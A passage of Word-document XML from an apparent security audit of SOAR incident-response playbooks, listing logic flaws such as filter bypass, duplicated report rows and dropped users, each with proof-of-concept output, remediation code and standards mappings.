        <w:t xml:space="preserve"> that suppresses malicious URL scores. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_logic.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case 4, real output): with the real action name but the coded datapath, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scores = []</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (nothing collected); feeding the coded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>crowdstrike_url_detonation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datapath with a string verdict raised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError: unsupported operand type(s) for /: 'str' and 'int'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: use the action's real datapath (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>url_detonation:...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the lists in the order the loop unpacks them, coerce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>threat_score</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to numeric with a default, and drop the dead </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>windows_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datapath. Mirror the (correct) file path's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>score_table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-670; CWE-682; CWE-390 Detection of Error Condition Without Action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.AE Detect - Adverse Event Analysis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-11 — Destructive leaf playbooks read raw unfiltered inputs, defeating the preceding filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Conditionally exploitable (scope widening).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/Cisco_Umbrella_DNS_Denylisting.py:54; CrowdStrike_OAuth_API_Dynamic_Analysis.py:76; CrowdStrike_OAuth_API_File_Restore.py:296-308; PhishTank_URL_Reputation_Analysis.py:30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Several leaf playbooks build their action parameters from the raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datapath instead of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filtered-data:...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output of the filter block that immediately precedes them. The per-item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if ... is not None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> check is weaker than the filter's condition, so any routing/validation the filter was meant to enforce is bypassed. In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>File_Restore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this is material: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run_admin_command_put</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uploads/pushes every artifact </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cef.fileName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the container back to the endpoint, not just files that passed the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>collected_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:file in cef.fileName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter_file_artifacts_0:331-356</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: artifact fields -&gt; raw datapath -&gt; action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (scope-widening of an action; combines with PB1-03). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: always collect action parameters from the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filtered-data:&lt;filter&gt;:&lt;condition&gt;:...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> path the filter produced, so the filter's guarantees hold at the sink.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-807; CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-13 — Account dispatch report/tagging logic flaws (only first user tagged, duplicated rows, None crash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Integrity of report/tagging (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/Active_Directory_Disable_Account_Dispatch.py:100-115; Active_Directory_Enable_Account_Dispatch.py:100-116</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>104  output_observable_values = [(i or "") for i in filtered_output_0_..._values]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>107  for observable_item in output_observable_values:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>108      if observable_item['status'] == "success":          # "" has no ['status'] -&gt; TypeError on None/empty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>111          normalized_...__value.append(user_name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>112          fmt_output += "{} | {} | {} | {} | \n".format(...)  # accumulates -&gt; each row repeats all prior rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>113          normalized_...__merge_report.append(fmt_output)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>114  normalized_...__value = normalized_...__value[0]          # keeps only the FIRST user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Three defects in one block: (1) a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/empty observable is coerced to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then indexed with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['status']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, raising </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fmt_output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is appended to without reset, so the N-th report row contains rows 1..N concatenated (quadratic, corrupted table); (3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>observable_value = observable_value[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> discards every user after the first, so when multiple accounts are disabled only the first is passed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>indicator_tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/workbook - the others are silently untagged. For an IR dispatch that disables several accounts this means incomplete tagging and a misleading report. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: observable values originate from the child playbooks acting on artifact users. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable for integrity/availability of the report+tagging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not a sink into a product). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_logic.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case 2, real output): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> observable -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError string indices must be integers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; with two successful users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>observable_value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"alice"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (second user dropped) and the second merge row = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"alice@corp | ... \nbob@corp | ... injected | row | ..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (row 1 duplicated inside row 2, and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"ok | injected | row |"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows an unescaped </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> breaking the table - a PB1-10 instance). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: skip falsy items, reset the row string per iteration, keep the value list:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>rows, users = [], []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for item in output_observable_values:</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if isinstance(item, dict) and item.get('status') == "success":</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users.append(item['value'].split("@")[0])</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rows.append("{} | {} | {} | {} |".format(md_escape(item['value']), md_escape(item['type']), md_escape(item['message']), item['status']))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>normalized_value = users            # keep all, don't take [0]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>normalized_merge_report = rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-670; CWE-682; CWE-248. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-13 — Hard-coded placeholder email recipient and sender in email_notification_for_malware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Not exploitable (placeholder).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/email_notification_for_malware.py:254-263</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>email_notification_for_malware.json:8324-8348</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'to': "recipient@phantom.localhost"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'from': "automation@phantom.localhost"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
